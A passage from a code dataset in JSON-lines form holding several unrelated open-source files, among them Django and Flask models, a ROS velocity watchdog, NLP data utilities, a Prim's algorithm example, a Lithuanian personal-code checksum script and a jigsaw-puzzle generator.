em_screen.ne_add)\n","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/lib/genera/src/python/radiation/emitt_spread.py","file_name":"emitt_spread.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"39037709029","text":"from django.urls import path\nfrom apps.libro.views import listLibros, libroCreate, libroDelete, libroUpdate\n\napp_name= 'libros'\nurlpatterns = [\n path('', listLibros, name= 'listlibros'),\n path('nuevo/', libroCreate, name= 'libroCreate'),\n path('actualizar//', libroUpdate, name= 'libroUpdate'),\n path('eeliminar//', libroDelete, name= 'libroDelete'),\n]","repo_name":"ACAMARGO97/taller_3corte","sub_path":"apps/libro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37186125539","text":"import json\nencodes = 0\nliterals = 0\nwith open('input.txt') as input:\n for line in input:\n line = line.replace('\\n', '')\n literals += len(line)\n encoded = json.dumps(line)\n encodes += len(encoded)\nprint(encodes - literals)\n","repo_name":"gla3dr/Advent-of-Code","sub_path":"2015/Day8/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19389273796","text":"import numpy as np\n\n\nclass CoNLLDataset(object):\n\n def __init__(self, filename, processing_word=None, processing_tag=None):\n self.filename = filename\n self.processing_word = processing_word\n self.processing_tag = processing_tag\n self.length = None\n self.file_stream = None\n\n def __iter__(self):\n return self\n\n def __len__(self):\n if self.length is None:\n self.length = 0\n for _ in self:\n self.length += 1\n\n return self.length\n\n def __next__(self):\n if self.file_stream is None:\n self.rest_stream()\n return self.__next_sentence()\n\n def __next_sentence(self):\n words, tags = [], []\n while True:\n\n try:\n line = next(self.file_stream)\n except Exception as e:\n if len(words) != 0:\n return words, tags\n\n self.rest_stream()\n raise e\n\n line = line.strip()\n\n if len(line) == 0 or line.startswith(\"-DOCSTART-\"):\n if len(words) != 0:\n return words, tags\n else:\n line_words = line.split(' ')\n\n words += [self.processing_word(line_words[0]) if self.processing_word is not None else line_words[0]]\n tags += [self.processing_tag(line_words[1]) if self.processing_tag is not None else line_words[1]]\n\n def rest_stream(self):\n if self.file_stream is not None:\n self.file_stream.close()\n self.file_stream = open(self.filename)\n\n def make_vocab(self):\n vocab_words = set()\n vocab_tags = set()\n vocab_chars = set()\n for words, tags in self:\n vocab_words.update(words)\n vocab_tags.update(tags)\n\n for word in vocab_words:\n vocab_chars.update(word)\n\n self.rest_stream()\n\n return vocab_words, vocab_tags, vocab_chars\n\n @staticmethod\n def load_vocab(filename):\n try:\n dictionary = dict()\n with open(filename) as f:\n for idx, word in enumerate(f):\n word = word.strip()\n dictionary[word] = idx\n\n except IOError:\n raise Exception(\"Unable to locate file {}\".format(filename))\n return dictionary\n\n @staticmethod\n def write_vocab(vocab, filename):\n with open(filename, \"w\") as f:\n f.write('\\n'.join(vocab))\n\n\nUNK = \"$UNK$\"\nNUM = \"$NUM$\"\nNONE = \"O\"\n\n\ndef standard_processing(word):\n if word.isdigit():\n word = NUM\n\n return word\n\n\ndef lowercase_processing(word):\n word = standard_processing(word.lower())\n\n return word\n\n\ndef word_processing(vocab_words, vocab_chars):\n def processing(word):\n\n char_ids = []\n for char in word:\n # ignore chars out of vocabulary\n if char in vocab_chars:\n char_ids += [vocab_chars[char]]\n\n word = lowercase_processing(word)\n\n if word in vocab_words:\n word = vocab_words[word]\n else:\n word = vocab_words[UNK]\n\n return char_ids, word\n\n return processing\n\n\ndef tag_processing(vocab_tags):\n def processing(word):\n\n word = standard_processing(word)\n\n if word in vocab_tags:\n word = vocab_tags[word]\n else:\n word = vocab_tags[UNK]\n\n return word\n\n return processing\n\n\ndef export_glove_train(vocab, glove_filename, trimmed_filename, dim):\n embeddings = np.zeros([len(vocab), dim])\n with open(glove_filename) as f:\n for line in f:\n line = line.strip().split(' ')\n word = line[0]\n embedding = [float(x) for x in line[1:]]\n if word in vocab:\n word_idx = vocab[word]\n embeddings[word_idx] = np.asarray(embedding)\n\n np.savez_compressed(trimmed_filename, embeddings=embeddings)\n\n\ndef load_glove_train(trimmed_filename):\n try:\n with np.load(trimmed_filename) as data:\n return data[\"embeddings\"]\n\n except IOError:\n raise Exception(\"Unable to locate file {}\".format(trimmed_filename))\n\n\ndef minibatches(data, minibatch_size):\n words_batch, label_batch = [], []\n for (word, label) in data:\n if len(words_batch) == minibatch_size:\n yield words_batch, label_batch\n words_batch, label_batch = [], []\n\n words_batch += [zip(*word)]\n label_batch += [label]\n\n if len(words_batch) != 0:\n yield words_batch, label_batch\n\n\ndef fill_array(arr, max_length):\n return list(arr)[:max_length] + [0] * (max_length - len(arr))\n\n\ndef pad_sequences(sequences, sequences_length=None):\n sequences_length = max(\n map(lambda x: len(x) if type(x) is not int else 0, sequences)) if sequences_length is None else sequences_length\n\n seqs = []\n lengths = []\n for sequence in sequences:\n\n seq = fill_array(sequence if type(sequence) is not int else [sequence], sequences_length)\n length = len(sequence) if type(sequence) is not int else 0\n\n if type(sequence) is not int and type(sequence[0]) == list:\n max_length_word = max([max(map(lambda x: len(x), _seq)) for _seq in sequences])\n\n # seq = list(map(lambda x: [x] if type(x) == int else x, seq))\n seq, length = pad_sequences(seq, max_length_word)\n\n lengths += [length]\n seqs += [seq]\n\n return seqs, lengths\n\n\ndef get_chunks(seq, tags):\n chunks = []\n for i, label_id in enumerate(seq):\n if len(chunks) != 0 and chunks[-1][0] == label_id:\n chunks[-1][2] += 1\n else:\n chunks.append([label_id, i, i + 1])\n\n return list(map(lambda x: tuple(x), chunks))\n","repo_name":"Inonut/text-processing","sub_path":"util/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74739621929","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom roomallocation.models import RoomAllocation\n\n\nclass RoomAllocationSerializer(serializers.ModelSerializer):\n class Meta:\n model = RoomAllocation\n fields = '__all__'\n depth = 4\n\n @staticmethod\n def setup_eager_loading(queryset):\n queryset = queryset.select_related(\n 'student',\n 'student__user',\n 'student__major',\n 'student__major__dept',\n 'student__major__dept__college',\n 'student__level',\n 'student__mode_of_entry',\n 'room',\n 'session',\n 'allocated_by',\n 'allocated_by__user',\n )\n return queryset\n\n\nclass RoomAllocationCreateSerializer(serializers.ModelSerializer):\n class Meta:\n validators = [\n UniqueTogetherValidator(\n queryset=RoomAllocation.objects.all(),\n fields=('student', 'session')\n )\n ]\n model = RoomAllocation\n fields = '__all__'\n","repo_name":"GHostEater/Portal","sub_path":"roomallocation/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352484217","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Prim求最小生成树,图用邻接矩阵表示\n\nINF = 65535\n\nclass Graph(object):\n def __init__(self, vsize):\n self.vsize = vsize\n # 邻接矩阵\n self.matrix = [[0 for x in range(vsize)] for _ in range(vsize)]\n\n def echo(self, parent):\n print(\"Edge \\tWeight\")\n for i in range(1, self.vsize):\n print(parent[i],\"-\",i,\"\\t\",self.matrix[i][parent[i]])\n\n def mindist(self, distance, visit):\n mindistance = INF\n u = -1\n for v in range(self.vsize):\n if distance[v] < mindistance and not visit[v]:\n mindistance = distance[v]\n u = v\n return u\n\n def prim(self):\n # 初始距离无穷\n distance = [INF]*self.vsize\n # 选取第一个节点被访问\n distance[0] = 0\n # 节点是否被访问\n visit = [False]*self.vsize\n # \n parent = [None]*self.vsize\n parent[0] = -1\n\n for i in range(self.vsize):\n u = self.mindist(distance, visit)\n visit[u] = True\n\n # 寻找下一个节点,并选择距离小的节点\n for v in range(self.vsize):\n # self.matrix[u][v] > 0 : > 0 保证了节点和当前选定节点是连通的\n if self.matrix[u][v] > 0 and distance[v] > self.matrix[u][v] and not visit[v]:\n distance[v] = self.matrix[u][v]\n parent[v] = u\n self.echo(parent)\n\ng = Graph(5)\ng.matrix = [ [0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0],\n ]\n \ng.prim()\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"graph/Prim.py","file_name":"Prim.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"71007960169","text":"from app import db, base_func\nimport redis\nimport rq.exceptions\nfrom passlib.hash import sha256_crypt\nfrom flask import current_app\n\nassociation_users_roles = db.Table(\n 'association_users_roles',\n db.Column('student_id', db.Integer, db.ForeignKey('users.id')),\n db.Column('teacher_id', db.Integer, db.ForeignKey('users.id'))\n)\nassociation_users_subject = db.Table('subjects_mtm',\n db.Column('user_id', db.Integer, db.ForeignKey('users.id'), primary_key=True),\n db.Column('subjects_id', db.Integer, db.ForeignKey('subjects.id'), primary_key=True)\n)\nassociation_users_scheduling = db.Table('users_scheduling_mtm',\n db.Column('user_id', db.Integer, db.ForeignKey('users.id'), primary_key=True),\n db.Column('scheduling_id', db.Integer, db.ForeignKey('schedulings.id'), primary_key=True)\n)\n\n\nclass User(db.Model, base_func.BaseFuncs):\n __tablename__ = 'users'\n\n id = db.Column(db.Integer, primary_key=True)\n telegram_id = db.Column(db.Integer)\n email = db.Column(db.String(), unique=True)\n password = db.Column(db.String(128))\n phone_number = db.Column(db.String())\n full_name = db.Column(db.String())\n is_teacher = db.Column(db.Boolean, default=False)\n tasks = db.relationship('Task', backref='user', lazy='dynamic')\n lesson_date = db.relationship(\n \"Scheduling\", secondary=association_users_scheduling,\n lazy=\"dynamic\", backref=db.backref(\"users\", lazy='dynamic')\n )\n teachers = db.relationship(\n 'User', secondary=association_users_roles,\n primaryjoin=(association_users_roles.c.teacher_id == id),\n secondaryjoin=(association_users_roles.c.student_id == id),\n backref=db.backref('students', lazy='dynamic'), lazy='dynamic')\n subjects = db.relationship(\n \"Subject\", secondary=association_users_subject,\n lazy=\"dynamic\", backref=db.backref(\"users\", lazy='dynamic')\n )\n\n def check_password_hash(self, password):\n return sha256_crypt.verify(password, self.password)\n\n def __init__(self, email=None, password='', telegram_id=None) -> None:\n self.email = email\n self.password = sha256_crypt.hash(password.strip())\n self.telegram_id = telegram_id\n\n def to_dict(self):\n if self.is_teacher:\n users = self.students\n else:\n users = self.teachers\n return dict(\n id=self.id, telegram_id=self.telegram_id, email=self.email,\n phone_number=self.phone_number, full_name=self.full_name,\n is_teacher=self.is_teacher,\n lesson_date=[lesson_time.to_dict()\n for lesson_time in self.lesson_date],\n subjects=[{'id': subject.id, 'title': subject.title}\n for subject in self.subjects],\n users=[{'id': user.id, 'telegram_id': user.telegram_id,\n 'full_name': user.full_name, 'is_teacher': user.is_teacher,\n 'email': user.email} for user in users]\n )\n\n def launch_task(self, name, description, *args, **kwargs):\n rq_job = current_app.task_queue.enqueue('app.tasks.' + name, self.id,\n *args, **kwargs)\n task = Task(id=rq_job.get_id(), name=name, description=description,\n user=self)\n db.session.add(task)\n return task\n\n def get_tasks_in_progress(self):\n return Task.query.filter_by(user=self, complete=False).all()\n\n def get_task_in_progress(self, name):\n return Task.query.filter_by(name=name, user=self,\n complete=False).first()\n\n def __repr__(self) -> str:\n return f'<{\"Teacher\" if self.is_teacher else \"Student\"}: {self.email}>'\n\n\nclass Subject(db.Model, base_func.BaseFuncs):\n __tablename__ = 'subjects'\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(), unique=True, nullable=False)\n description = db.Column(db.String())\n lesson_time = db.relationship(\"Scheduling\", backref=\"subject\", lazy='dynamic', cascade=\"all, delete\")\n\n def __init__(self, title: str, description=None) -> None:\n self.title = title.title()\n self.description = description or None\n\n def to_dict(self):\n return dict(\n id=self.id,\n title=self.title,\n description=self.description,\n lesson_time=[{'id': lesson_time.id, 'time': lesson_time.lesson_time, 'confirmation': lesson_time.confirmation, 'subject': lesson_time.subject.title} for lesson_time in self.lesson_time],\n users=[{'id': user.id, 'telegram_id': user.telegram_id, 'full_name': user.full_name, 'is_teacher': user.is_teacher, 'email': user.email} for user in self.users]\n )\n\n def __repr__(self) -> str:\n return f''\n\n\nclass Scheduling(db.Model, base_func.BaseFuncs):\n __tablename__ = 'schedulings'\n\n id = db.Column(db.Integer, primary_key=True)\n confirmation = db.Column(db.Boolean, default=False)\n lesson_time = db.Column(db.DateTime)\n subject_id = db.Column(db.Integer, db.ForeignKey('subjects.id'))\n\n def to_dict(self):\n return dict(\n id=self.id,\n status=self.confirmation,\n time=self.lesson_time,\n subject=self.subject.title,\n users=[{\n 'id': user.id, 'telegram_id': user.telegram_id,\n 'full_name': user.full_name, 'is_teacher': user.is_teacher,\n 'email': user.email, 'phone_number': user.phone_number\n } for user in self.users]\n )\n\n def __repr__(self) -> str:\n return f''\n\n\nclass Task(db.Model):\n id = db.Column(db.String(36), primary_key=True)\n name = db.Column(db.String(128), index=True)\n description = db.Column(db.String(128))\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n complete = db.Column(db.Boolean, default=False)\n\n def get_rq_job(self):\n try:\n rq_job = rq.job.Job.fetch(self.id, connection=current_app.redis)\n except (redis.exceptions.RedisError, rq.exceptions.NoSuchJobError):\n return None\n return rq_job\n\n def get_progress(self):\n job = self.get_rq_job()\n return job.meta.get('progress', 0) if job is not None else 100\n","repo_name":"besvova490/beetroot_project","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74949308007","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport sys\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist, Vector3\nimport time\n\ndef println(*data):\n\tprint(*data, file=sys.stderr)\n\ndef getTime():\n\treturn int(round(time.time() * 1000))\n\nstop = Twist(linear=Vector3(0.0, 0.0, 0.0))\nlastTime = getTime()\nlastEnableTime = 0\nmessage = stop\nenabled = False\ncanGoForwardCount = 0\nlastForwardTime = getTime()\n\ndef callback(data):\n\tglobal message\n\tglobal lastTime\n\tmessage = data\n\t# Nothing to see here\n\t# message.angular.z = -1.0 * message.angular.z\n\tlastTime = getTime()\n\ndef enabledCallback(data):\n\tglobal enabled\n\tglobal lastEnableTime\n\tif \"1\" in data.data:\n\t\tenabled = True\n\telse:\n\t\tenabled = False\n\tlastEnableTime = getTime()\n\ndef forwardCallback(data):\n\tglobal canGoForwardCount\n\tglobal lastForwardTime\n\tlastForwardTime = getTime()\n\tif \"1\" in data.data:\n\t\tcanGoForwardCount = min(canGoForwardCount + 1, 5)\n\telse:\n\t\tcanGoForwardCount = max(canGoForwardCount - 2, 0)\n\n\nrospy.init_node(\"watchdog\", anonymous=True)\nvelpub = rospy.Publisher(\"/jackal_velocity_controller/cmd_vel\", Twist, queue_size=10)\nvelsub = rospy.Subscriber(\"/cmd_vel\", Twist, callback)\nenablesub = rospy.Subscriber(\"/enabled\", String, enabledCallback)\nforwardsub = rospy.Subscriber(\"/forward\", String, forwardCallback)\n\nwhile not rospy.is_shutdown():\n\tprint(\"count: \", canGoForwardCount)\n\tif getTime() - lastForwardTime > 350 and message.linear.x > 0:\n\t\tmessage.linear.x = 0\n\telif canGoForwardCount <= 2 and message.linear.x > 0:\n\t\tmessage.linear.x = canGoForwardCount * message.linear.x / 4.0\n\n\tif getTime() - lastTime > 250 or not enabled or getTime() - lastEnableTime > 100:\n\t\tprint(\"STOPPING DUE TO TIMEOUT\")\n\t\tvelpub.publish(stop)\n\telse:\n\t\tvelpub.publish(message)\n","repo_name":"NVIDIA-AI-IOT/Foresee-Navigation","sub_path":"ros_workspace/src/robot_control/src/watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"53"} +{"seq_id":"4548428234","text":"def gauti_ak_kontrolini(kodas):\r\n kodas_str = str(kodas)\r\n A = int(kodas_str[0])\r\n B = int(kodas_str[1])\r\n C = int(kodas_str[2])\r\n D = int(kodas_str[3])\r\n E = int(kodas_str[4])\r\n F = int(kodas_str[5])\r\n G = int(kodas_str[6])\r\n H = int(kodas_str[7])\r\n I = int(kodas_str[8])\r\n J = int(kodas_str[9])\r\n S = A * 1 + B * 2 + C * 3 + D * 4 + E * 5 + F * 6 + G * 7 + H * 8 + I * 9 + J * 1\r\n if S % 11 != 10:\r\n kontrolinis = S % 11\r\n else:\r\n S = A * 3 + B * 4 + C * 5 + D * 6 + E * 7 + F * 8 + G * 9 + H * 1 + I * 2 + J * 3\r\n if S % 11 != 10:\r\n kontrolinis = S % 11\r\n else:\r\n kontrolinis = 0\r\n return kontrolinis\r\n\r\ndef ak_validavimas(kodas):\r\n K = int(str(kodas)[-1])\r\n return gauti_ak_kontrolini(kodas) == K\r\n\r\n\r\n# print(ak_validavimas(40204219251))\r\n# print(ak_validavimas(49508079556))\r\n\r\ndef ak_generavimas(lytis, data, eilesnr):\r\n data_split = data.split(\"-\")\r\n metai1 = data_split[0][:2]\r\n\r\n if lytis == \"vyras\":\r\n pirmas_skaicius = str((int(metai1) - 18) * 2 + 1)\r\n else:\r\n pirmas_skaicius = str((int(metai1) - 18) * 2 + 2)\r\n\r\n metai2 = data_split[0][2:]\r\n menuo = data_split[1]\r\n diena = data_split[2]\r\n be_paskutinio = pirmas_skaicius + metai2 + menuo + diena + eilesnr\r\n return int(be_paskutinio + str(gauti_ak_kontrolini(be_paskutinio)))\r\n\r\nprint(ak_generavimas(\"vyras\", \"2000-12-12\", \"045\"))\r\nprint(ak_generavimas(\"vyras\", \"2000-12-12\", \"512\"))\r\nprint(ak_generavimas(\"moteris\", \"1995-12-12\", \"500\"))\r\n\r\n","repo_name":"DonatasNoreika/python1lygis","sub_path":"Programos/Funkcijos/asmens_kodas.py","file_name":"asmens_kodas.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"lt","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"42661674405","text":"from django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\nfrom django.template.loader import render_to_string\nfrom django.utils.functional import memoize\n\nfrom projects import constants\nfrom projects.utils import diff, dmp, safe_write\n\nfrom taggit.managers import TaggableManager\n\nimport os\nimport re\nimport fnmatch\n\n\nclass ProjectManager(models.Manager):\n def live(self, *args, **kwargs):\n base_qs = self.filter(status=constants.LIVE_STATUS)\n return base_qs.filter(*args, **kwargs)\n\n\nclass Project(models.Model):\n user = models.ForeignKey(User, related_name='projects')\n name = models.CharField(max_length=255)\n slug = models.SlugField()\n description = models.TextField(blank=True,\n help_text='restructuredtext description of the project')\n repo = models.CharField(max_length=100, blank=True,\n help_text='URL for your code (hg or git). Ex. http://github.com/ericholscher/django-kong.git')\n docs_directory = models.CharField(max_length=255, blank=True)\n project_url = models.URLField(blank=True, help_text='the project\\'s homepage')\n pub_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n version = models.CharField(max_length=100, blank=True,\n help_text='project version these docs apply to, i.e. 1.0a')\n copyright = models.CharField(max_length=255, blank=True,\n help_text='project copyright information')\n theme = models.CharField(max_length=20,\n choices=constants.DEFAULT_THEME_CHOICES, default=constants.THEME_DEFAULT,\n help_text='Examples')\n path = models.CharField(max_length=255, editable=False)\n suffix = models.CharField(max_length=10, editable=False, default='.rst')\n extensions = models.CharField(max_length=255, editable=False, default='')\n status = models.PositiveSmallIntegerField(choices=constants.STATUS_CHOICES,\n default=constants.LIVE_STATUS)\n\n tags = TaggableManager()\n\n objects = ProjectManager()\n\n class Meta:\n ordering = ('-modified_date', 'name')\n\n def __unicode__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('projects_detail', args=[self.user.username, self.slug])\n\n def get_docs_url(self):\n return reverse('docs_detail', args=[self.user.username, self.slug, ''])\n\n def get_doc_root(self):\n \"\"\"\n Return a user specified doc url.\n \"\"\"\n return os.path.join(\n settings.DOCROOT, # the root of the user builds .../user_build\n self.user.username, # docs are stored using the username as the\n self.slug, # docs are organized by project\n self.slug, # code is checked out here\n self.docs_directory # this is the directory where the docs live\n )\n\n @property\n def user_doc_path(self):\n return os.path.join(settings.DOCROOT, self.user.username, self.slug)\n #user_doc_path = property(memoize(user_doc_path, {}, 1))\n\n @property\n def full_doc_path(self):\n \"\"\"\n The path to the documentation root in the project.\n \"\"\"\n doc_base = os.path.join(self.user_doc_path, self.slug)\n for possible_path in ['docs', 'doc']:\n if os.path.exists(os.path.join(doc_base, '%s' % possible_path)):\n return os.path.join(doc_base, '%s' % possible_path)\n #No docs directory, assume a full docs checkout\n return doc_base\n #full_doc_path = property(memoize(full_doc_path, {}, 1))\n\n @property\n def full_html_path(self):\n \"\"\"\n The path to the build html docs in the project.\n \"\"\"\n doc_path = self.full_doc_path\n for pos_build in ['build', '_build', '.build']:\n if os.path.exists(os.path.join(doc_path, '%s/html' % pos_build)):\n return os.path.join(doc_path, '%s/html' % pos_build)\n\n #full_html_path = property(memoize(full_html_path, {}, 1))\n\n def find(self, file):\n \"\"\"\n A balla API to find files inside of a projects dir.\n \"\"\"\n matches = []\n for root, dirnames, filenames in os.walk(self.full_doc_path):\n for filename in fnmatch.filter(filenames, file):\n matches.append(os.path.join(root, filename))\n return matches\n\n find = memoize(find, {}, 2)\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Project, self).save(*args, **kwargs)\n\n @property\n def template_dir(self):\n return os.path.join(settings.SITE_ROOT, 'templates', 'sphinx')\n\n def get_index_filename(self):\n return os.path.join(self.path, 'index.rst')\n\n def get_rendered_index(self):\n return render_to_string('projects/index.rst.html', {'project': self})\n\n def write_index(self):\n if not self.is_imported:\n safe_write(self.get_index_filename(), self.get_rendered_index())\n\n @property\n def is_imported(self):\n return bool(self.repo)\n\n @property\n def repo_type(self):\n if self.is_imported:\n if re.match('(https?://|git://)github', self.repo):\n return 'git'\n elif self.repo.startswith('http://bitbucket'):\n return 'hg'\n elif self.repo.endswith('git'):\n return 'git'\n\n def get_latest_revisions(self):\n revision_qs = FileRevision.objects.filter(file__project=self,\n file__status=constants.LIVE_STATUS)\n return revision_qs.order_by('-created_date')\n\n def get_top_level_files(self):\n return self.files.live(parent__isnull=True).order_by('ordering')\n\n @property\n def conf_filename(self):\n return os.path.join(self.path, 'conf.py')\n\n def get_rendered_conf(self):\n return render_to_string('projects/conf.py.html', {'project': self})\n\n def write_to_disk(self):\n safe_write(self.conf_filename, self.get_rendered_conf())\n\n\nclass FileManager(models.Manager):\n def live(self, *args, **kwargs):\n base_qs = self.filter(status=constants.LIVE_STATUS)\n return base_qs.filter(*args, **kwargs)\n\n\nclass File(models.Model):\n project = models.ForeignKey(Project, related_name='files')\n parent = models.ForeignKey('self', null=True, blank=True, related_name='children')\n heading = models.CharField(max_length=255)\n slug = models.SlugField()\n content = models.TextField()\n denormalized_path = models.CharField(max_length=255, editable=False)\n ordering = models.PositiveSmallIntegerField(default=1)\n status = models.PositiveSmallIntegerField(choices=constants.STATUS_CHOICES,\n default=constants.LIVE_STATUS)\n\n objects = FileManager()\n\n class Meta:\n ordering = ('denormalized_path',)\n\n def __unicode__(self):\n return '%s: %s' % (self.project.name, self.heading)\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.heading)\n\n if self.parent:\n path = '%s/%s' % (self.parent.denormalized_path, self.slug)\n else:\n path = self.slug\n\n self.denormalized_path = path\n\n super(File, self).save(*args, **kwargs)\n\n if self.children:\n def update_children(children):\n for child in children:\n child.save()\n update_children(child.children.all())\n update_children(self.children.all())\n #Update modified time on project.\n self.project.save()\n\n @property\n def depth(self):\n return len(self.denormalized_path.split('/'))\n\n def create_revision(self, old_content, comment):\n FileRevision.objects.create(\n file=self,\n comment=comment,\n diff=diff(self.content, old_content)\n )\n\n @property\n def current_revision(self):\n return self.revisions.filter(is_reverted=False)[0]\n\n def get_html_diff(self, rev_from, rev_to):\n rev_from = self.revisions.get(revision_number=rev_from)\n rev_to = self.revisions.get(revision_number=rev_to)\n\n diffs = dmp.diff_main(rev_from.diff, rev_to.diff)\n return dmp.diff_prettyHtml(diffs)\n\n def revert_to(self, revision_number):\n revision = self.revisions.get(revision_number=revision_number)\n revision.apply()\n\n @property\n def filename(self):\n return os.path.join(\n self.project.path,\n '%s.rst' % self.denormalized_path\n )\n\n def get_rendered(self):\n return render_to_string('projects/doc_file.rst.html', {'file': self})\n\n def write_to_disk(self):\n safe_write(self.filename, self.get_rendered())\n\n\nclass FileRevision(models.Model):\n file = models.ForeignKey(File, related_name='revisions')\n comment = models.TextField(blank=True)\n diff = models.TextField(blank=True)\n created_date = models.DateTimeField(auto_now_add=True)\n\n revision_number = models.IntegerField()\n is_reverted = models.BooleanField(default=False)\n\n class Meta:\n ordering = ('-revision_number',)\n\n def __unicode__(self):\n return self.comment or '%s #%s' % (self.file.heading, self.revision_number)\n\n def get_file_content(self):\n \"\"\"\n Apply the series of diffs after this revision in reverse order,\n bringing the content back to the state it was in this revision\n \"\"\"\n after = self.file.revisions.filter(revision_number__gt=self.revision_number)\n content = self.file.content\n\n for revision in after:\n patch = dmp.patch_fromText(revision.diff)\n content = dmp.patch_apply(patch, content)[0]\n\n return content\n\n def apply(self):\n original_content = self.file.content\n\n # store the old content on the file\n self.file.content = self.get_file_content()\n self.file.save()\n\n # mark reverted changesets\n reverted_qs = self.file.revisions.filter(revision_number__gt=self.revision_number)\n reverted_qs.update(is_reverted=True)\n\n # create a new revision\n FileRevision.objects.create(\n file=self.file,\n comment='Reverted to #%s' % self.revision_number,\n diff=diff(self.file.content, original_content)\n )\n\n def save(self, *args, **kwargs):\n if not self.pk:\n max_rev = self.file.revisions.aggregate(max=models.Max('revision_number'))\n if max_rev['max'] is None:\n self.revision_number = 1\n else:\n self.revision_number = max_rev['max'] + 1\n super(FileRevision, self).save(*args, **kwargs)\n","repo_name":"chrisdickinson/tweezers","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19742121098","text":"t = int(input())\nfor _ in range(t):\n ll1 = []\n ll2 = []\n s = input()\n l = len(s)\n for i in range(l):\n if s[i] == '<':\n if ll1:\n ll2.append(ll1.pop())\n elif s[i] == '>':\n if ll2:\n ll1.append(ll2.pop())\n elif s[i] == '-':\n if ll1:\n ll1.pop()\n else:\n ll1.append(s[i])\n \n ll1.extend(reversed(ll2))\n answer = ''.join(ll1)\n print(answer)","repo_name":"SeongrokKim/python-practice","sub_path":"backjoon/코딩테스트 문제풀이/자료구조/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37857955734","text":"from PIL import Image, ImageDraw\nimport numpy as np\nfrom random import randrange\nimport uuid\n\nclass Board:\n WIDTH = 20\n HEIGHT = 20\n\n def __init__(self, image_path):\n self.image = Image.open(image_path)\n self.pix = np.array(self.image)\n self.pixel_height, self.pixel_width, _ = self.pix.shape\n h, w, _ = self.pix.shape\n if w % self.WIDTH != 0 or h % self.HEIGHT != 0:\n raise Exception(\"Image dimensions are not a multiple of board dimensions\")\n\n self.piece_width = w // self.WIDTH\n self.piece_height = h // self.HEIGHT\n Piece.resize_handle((self.piece_width//2, self.piece_height//2))\n self.board = self.init_board()\n\n def init_board(self):\n board = []\n\n for i in range(self.WIDTH):\n row = []\n for j in range(self.HEIGHT):\n origin_x = j * self.piece_width\n origin_y = i * self.piece_height\n region = self.image.crop((origin_x, origin_y, origin_x+self.piece_width, origin_y+self.piece_height))\n row.append(Piece(region))\n board.append(row)\n\n for i, row in enumerate(board):\n for j, piece in enumerate(row):\n if j < len(row) - 1:\n right = randrange(1,3)\n piece.set_side(1, right)\n row[j+1].set_opposite_side(1, right)\n\n if i < len(board)-1:\n down = randrange(1,3)\n piece.set_side(2, down)\n board[i+1][j].set_opposite_side(2, down)\n return board\n\n def generate_image(self):\n im = Image.new(\"RGBA\", (self.pixel_width, self.pixel_height))\n draw = ImageDraw.Draw(im)\n for i, row in enumerate(self.board):\n for j, piece in enumerate(row):\n origin_x = j * self.piece_width\n origin_y = i * self.piece_height\n region = piece.image_region\n im.paste(region, (origin_x, origin_y))\n draw.rectangle((origin_x, origin_y, origin_x+self.piece_width, origin_y+self.piece_height), outline=(255,0 ,0))\n\n im.save(\"board.png\")\n\n def generate_pieces(self):\n for i, row in enumerate(self.board):\n for j, piece in enumerate(row):\n origin_x = j * self.piece_width\n origin_y = i * self.piece_height\n mask = piece.generate_mask()\n im = Image.new(\"RGBA\", mask.size)\n w,h = mask.size\n left_offset = (w - self.piece_width) // 2\n top_offset = (h - self.piece_height) // 2\n mask_origin_x = origin_x - left_offset\n mask_origin_y = origin_y - top_offset\n region = self.image.crop((mask_origin_x, mask_origin_y, mask_origin_x + w, mask_origin_y + h))\n im.paste(region, mask=mask)\n random_name = uuid.uuid4().hex\n im.save(f\"pieces/{random_name}.png\")\n\n\n\nclass Piece:\n SIDE_TYPES = {\n \"FLAT\": 0,\n \"FEMALE\": 1,\n 